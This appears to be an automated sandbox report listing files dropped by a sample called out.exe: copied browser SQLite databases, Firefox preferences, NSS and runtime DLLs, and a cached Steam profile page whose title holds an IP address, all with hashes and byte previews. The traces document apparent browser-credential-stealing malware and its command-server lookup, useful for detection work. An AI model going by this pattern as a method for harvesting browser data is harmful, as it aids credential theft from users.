                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\CGIDGC

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\CGIDGC-shm

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\EGCBAF

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\FBKJKE

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\GCAKKE

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                        Entropy (8bit):1.121297215059106
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\HDAAAA

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\HDHJEB

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                        Entropy (8bit):0.8439810553697228
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\IIIEBG

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):9504
                                                                                                                                                                                        Entropy (8bit):5.512408163813622
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                        MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                        SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                        SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                        SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\KEHJKJ

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\KKEHIE

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\freebl3.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: wULBz8VjH0.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: FdjDPFGTZS.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: 45Ywq5ad5H.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: f1r6P3j3g7.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: NdSXVNeoET.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: VLSiVR4Qxs.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\mozglue.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: wULBz8VjH0.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: FdjDPFGTZS.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: 45Ywq5ad5H.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: f1r6P3j3g7.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: NdSXVNeoET.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: VLSiVR4Qxs.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\msvcp140.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\nss3.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\softokn3.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199780418869[1].htm

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):34889
                                                                                                                                                                                        Entropy (8bit):5.398879878767722
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:6dpqme0Ih+3tAA6WG9OfcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2H:6d8me0Ih+3tAA6WG9OFhTBv++nIjBtPT
                                                                                                                                                                                        MD5:F2396C7A42E077E051828342124AF647
                                                                                                                                                                                        SHA1:42F962F03598E049ABC7DF5714B626BD87B84D30
                                                                                                                                                                                        SHA-256:132EE07E7F11594B396A004AF61B6AE9411684A6FED301D16723A16E22FFD0C1
                                                                                                                                                                                        SHA-512:395C051E8EAE0E4EB49724D75323A943D0D87338A88CADFFAE5A114A6E9AF789427BE3F6C5D539C6D59E56811142BF41E092663F0AD9649D46AE31805BFC8F5F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.106.214|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1048575
                                                                                                                                                                                        Entropy (8bit):0.0
